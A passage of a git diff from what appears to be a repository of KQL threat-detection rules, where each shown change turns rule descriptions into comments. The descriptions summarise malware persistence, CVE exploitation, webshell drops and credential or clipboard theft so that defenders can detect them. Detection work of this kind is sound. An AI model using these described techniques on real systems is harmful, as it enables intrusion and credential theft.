powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql index d7a03f6f..69cf42b9 100644 --- a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql @@ -3,9 +3,8 @@ // Date: 2022-01-24 // Level: high // Description: Detects specific windows registry modifications made by BlackByte ransomware variants. -BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption. -This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort. - +// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption. +// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql index 408b84d2..ef2106e1 100644 --- a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql +++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql @@ -3,8 +3,7 @@ // Date: 2025-10-20 // Level: high // Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. -This is a post-authentication step corresponding to CVE-2025-57790. - +// This is a post-authentication step corresponding to CVE-2025-57790. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql index 08a8e4cc..71d7f04e 100644 --- a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql @@ -3,8 +3,7 @@ // Date: 2020-05-13 // Level: high // Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. -This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. - +// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql index 59ae319c..8a984262 100644 --- a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql +++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql @@ -3,7 +3,6 @@ // Date: 2024-02-21 // Level: medium // Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. - // MITRE Tactic: Persistence // Tags: attack.persistence, cve.2024-1708, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql index 39e87097..6e7e53bd 100644 --- a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql +++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql @@ -3,8 +3,7 @@ // Date: 2024-07-03 // Level: medium // Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. -The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. - +// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql index fa83fb64..3d759b47 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql @@ -3,7 +3,6 @@ // Date: 2023-05-02 // Level: high // Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql index 9b762bed..6fbff8d4 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql @@ -3,8 +3,7 @@ // Date: 2024-03-22 // Level: medium // Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. -This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. - +// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. // MITRE Tactic: Persistence // Tags: attack.persistence, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql index bd5277d2..606fce61 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql @@ -3,9 +3,8 @@ // Date: 2025-06-26 // Level: high // Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path. -This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. -The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. - +// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. +// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql index b130f579..63cba99d 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql @@ -3,8 +3,7 @@ // Date: 2024-07-31 // Level: low // Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. -Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. - +// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql index e06e18c0..d5c956e7 100644 --- a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql +++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql @@ -3,8 +3,7 @@ // Date: 2024-02-21 // Level: medium // Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. -This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. - +// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. // MITRE Tactic: Persistence // Tags: attack.persistence, cve.2024-1709, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql index 23849038..d403c1fd 100644 --- a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql +++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql @@ -3,7 +3,6 @@ // Date: 2025-04-17 // Level: high // Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql index f8a299e5..91935847 100644 --- a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql +++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql @@ -3,7 +3,6 @@ // Date: 2021-06-29 // Level: informational // Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql index 4093e401..ddea3ae3 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql @@ -3,8 +3,7 @@ // Date: 2025-10-20 // Level: medium // Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password. -This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials. - +// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788 // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql index b8420249..cf85ad6d 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql @@ -3,8 +3,7 @@ // Date: 2024-04-23 // Level: high // Description: Detects the setting of a custom protocol handler with the name "rogue". -Seen being created by Forest Blizzard APT as reported by MSFT. - +// Seen being created by Forest Blizzard APT as reported by MSFT. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql index 18a4b420..5a9afe86 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql @@ -3,8 +3,7 @@ // Date: 2024-04-23 // Level: high // Description: Detects the setting of the DLL that handles the custom protocol handler. -Seen being created by Forest Blizzard APT as reported by MSFT. - +// Seen being created by Forest Blizzard APT as reported by MSFT. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql index d91c5c3f..69a250e6 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql @@ -3,8 +3,7 @@ // Date: 2023-08-07 // Level: high // Description: Detects the execution of installed GuLoader malware on the host. -GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. - +// GuLoader is initiating network connections via the rundll32.exe process that is spawned via a browser parent(injected) process. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql index be69d3b9..938fdaf6 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql @@ -3,11 +3,10 @@ // Date: 2024-07-03 // Level: high // Description: Detects Kapeka backdoor persistence activity. -Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). -For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. -To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. -Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. - +// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). +// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. +// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. +// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql index 3470acc4..af3d2ddb 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql @@ -3,9 +3,8 @@ // Date: 2024-12-19 // Level: high // Description: Detects the execution of more.com and vbc.exe in the process tree. -This behavior was observed by a set of samples related to Lummac Stealer. -The Lummac payload is injected into the vbc.exe process. - +// This behavior was observed by a set of samples related to Lummac Stealer. +// The Lummac payload is injected into the vbc.exe process. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql index f2124a96..8e7dbbd1 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql @@ -3,10 +3,9 @@ // Date: 2025-10-02 // Level: high // Description: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. -This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. -When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, -potentially leading to arbitrary code execution and privilege escalation. - +// This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. +// When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, +// potentially leading to arbitrary code execution and privilege escalation. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.t1068, cve.2025-32463, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql index 59154956..fb0d5662 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql @@ -3,7 +3,6 @@ // Date: 2025-02-19 // Level: medium // Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql index 869374b7..da562f22 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql @@ -3,7 +3,6 @@ // Date: 2024-03-22 // Level: high // Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql index 7365fe39..793e6168 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql @@ -3,8 +3,7 @@ // Date: 2023-10-27 // Level: high // Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. -The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries - +// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats // False Positives: diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql index 8ccccbdf..147394fd 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql @@ -3,9 +3,8 @@ // Date: 2022-03-21 // Level: high // Description: Detects post exploitation execution technique of the Serpent backdoor. -According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. -It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. - +// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. +// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats // False Positives: diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql index 19069e8a..549dd621 100644 --- a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql +++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql @@ -3,11 +3,10 @@ // Date: 2024-07-30 // Level: medium // Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). -The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. -It can also be used in shell scripts that may require clipboard content as input. -Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. -Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. - +// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. +// It can also be used in shell scripts that may require clipboard content as input. +// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. +// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. // MITRE Tactic: Collection // Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql index 9b144aaf..20b4ab4f 100644 --- a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql +++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql @@ -3,9 +3,8 @@ // Date: 2024-05-31 // Level: medium // Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. -Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. -Use this rule to hunt for potential suspicious or uncommon activity in your environement. - +// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. +// Use this rule to hunt for potential suspicious or uncommon activity in your environement. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql index 6c9bee4a..b93ca019 100644 --- a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql +++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql @@ -3,8 +3,7 @@ // Date: 2024-11-07 // Level: medium // Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) -that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) - +// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql index a50c4793..d890d718 100644 --- a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql +++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql @@ -3,22 +3,14 @@ // Date: 2023-04-13 // Level: medium // Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. - -Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. -Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. - -Hunting Opportunity 1- Weed Out The Noise - -When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": - -ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" - -After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. - -Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours - -If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. - +// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. +// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. +// Hunting Opportunity 1- Weed Out The Noise +// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": +// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" +// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. +// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours +// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql index 68980619..41c8032f 100644 --- a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql +++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql @@ -3,7 +3,6 @@ // Date: 2023-10-25 // Level: medium // Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql index 34fbdd94..e03e9d3c 100644 --- a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql @@ -3,9 +3,8 @@ // Date: 2022-04-09 // Level: low // Description: Detects file access requests to browser credential stores by uncommon processes. -Could indicate potential attempt of credential stealing. -Requires heavy baselining before usage - +// Could indicate potential attempt of credential stealing. +// Requires heavy baselining before usage // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql index e84184c5..838ce0d9 100644 --- a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql +++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql @@ -3,8 +3,7 @@ // Date: 2024-07-29 // Level: low // Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. -Could indicate potential attempt of stealing sensitive information. - +// Could indicate potential attempt of stealing sensitive information. // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access, detection.threat-hunting // False Positives: diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql index c1c3f7b3..cf376a66 100644 --- a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql +++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql @@ -3,10 +3,9 @@ // Date: 2019-10-27 // Level: medium // Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. -The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in 